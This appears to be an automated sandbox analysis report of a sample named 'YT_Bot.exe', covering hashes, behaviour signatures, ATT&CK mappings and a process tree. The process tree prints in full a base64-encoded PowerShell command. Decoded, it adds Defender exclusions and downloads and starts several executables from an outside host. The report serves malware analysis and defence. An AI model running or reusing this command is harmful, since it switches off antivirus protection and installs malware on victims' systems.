Analysis

  • max time kernel
    149s
  • max time network
    52s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    18-06-2024 14:39

General

  • Target

    YT Bot/YT_Bot.exe

  • Size

    2.4MB

  • MD5

    240b2940002c38ebb3df80246920a729

  • SHA1

    ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467

  • SHA256

    552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d

  • SHA512

    d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1

  • SSDEEP

    49152:KyAKtpUvBE36OzFna+zSZt0zXxxqY95TmPZjQ5897e9zVfzlD3VtOr8c5n:KyAK7UC6OpacKul8dQ5897mdlP25

Score
5/10

Malware Config

Signatures

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe
    "C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4584
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2880

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueqk13ad.rww.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2880-33-0x0000000006990000-0x00000000069AE000-memory.dmp
    Filesize

    120KB

  • memory/2880-52-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-55-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-34-0x00000000075F0000-0x0000000007694000-memory.dmp
    Filesize

    656KB

  • memory/2880-5-0x0000000004F10000-0x0000000004F46000-memory.dmp
    Filesize

    216KB

  • memory/2880-6-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-7-0x00000000056F0000-0x0000000005D1A000-memory.dmp
    Filesize

    6.2MB

  • memory/2880-8-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-9-0x0000000005620000-0x0000000005642000-memory.dmp
    Filesize

    136KB

  • memory/2880-11-0x0000000005EF0000-0x0000000005F56000-memory.dmp
    Filesize

    408KB

  • memory/2880-10-0x0000000005E10000-0x0000000005E76000-memory.dmp
    Filesize

    408KB

  • memory/2880-35-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-14-0x0000000005F60000-0x00000000062B7000-memory.dmp
    Filesize

    3.3MB

  • memory/2880-21-0x00000000063D0000-0x00000000063EE000-memory.dmp
    Filesize

    120KB

  • memory/2880-22-0x0000000006460000-0x00000000064AC000-memory.dmp
    Filesize

    304KB

  • memory/2880-24-0x0000000070D60000-0x0000000070DAC000-memory.dmp
    Filesize

    304KB

  • memory/2880-23-0x00000000075B0000-0x00000000075E4000-memory.dmp
    Filesize

    208KB

  • memory/2880-51-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-4-0x0000000074B7E000-0x0000000074B7F000-memory.dmp
    Filesize

    4KB

  • memory/2880-50-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-37-0x0000000007D70000-0x00000000083EA000-memory.dmp
    Filesize

    6.5MB

  • memory/2880-36-0x0000000074B70000-0x0000000075321000-memory.dmp
    Filesize

    7.7MB

  • memory/2880-38-0x0000000007730000-0x000000000774A000-memory.dmp
    Filesize

    104KB

  • memory/2880-39-0x00000000077B0000-0x00000000077BA000-memory.dmp
    Filesize

    40KB

  • memory/2880-40-0x00000000079D0000-0x0000000007A66000-memory.dmp
    Filesize

    600KB

  • memory/2880-41-0x0000000007940000-0x0000000007951000-memory.dmp
    Filesize

    68KB

  • memory/2880-42-0x0000000007970000-0x000000000797E000-memory.dmp
    Filesize

    56KB

  • memory/2880-43-0x0000000007980000-0x0000000007995000-memory.dmp
    Filesize

    84KB

  • memory/2880-44-0x0000000007A70000-0x0000000007A8A000-memory.dmp
    Filesize

    104KB

  • memory/2880-45-0x00000000079C0000-0x00000000079C8000-memory.dmp
    Filesize

    32KB

  • memory/2880-46-0x0000000007AC0000-0x0000000007AE2000-memory.dmp
    Filesize

    136KB

  • memory/2880-47-0x00000000089A0000-0x0000000008F46000-memory.dmp
    Filesize

    5.6MB

  • memory/2880-49-0x0000000074B7E000-0x0000000074B7F000-memory.dmp
    Filesize

    4KB

  • memory/4584-2-0x0000000000400000-0x0000000000DDE000-memory.dmp
    Filesize

    9.9MB

  • memory/4584-0-0x0000000000400000-0x0000000000DDE000-memory.dmp
    Filesize

    9.9MB

  • memory/4584-1-0x000000007FAA0000-0x000000007FE71000-memory.dmp
    Filesize

    3.8MB

  • memory/4584-3-0x000000007FAA0000-0x000000007FE71000-memory.dmp
    Filesize

    3.8MB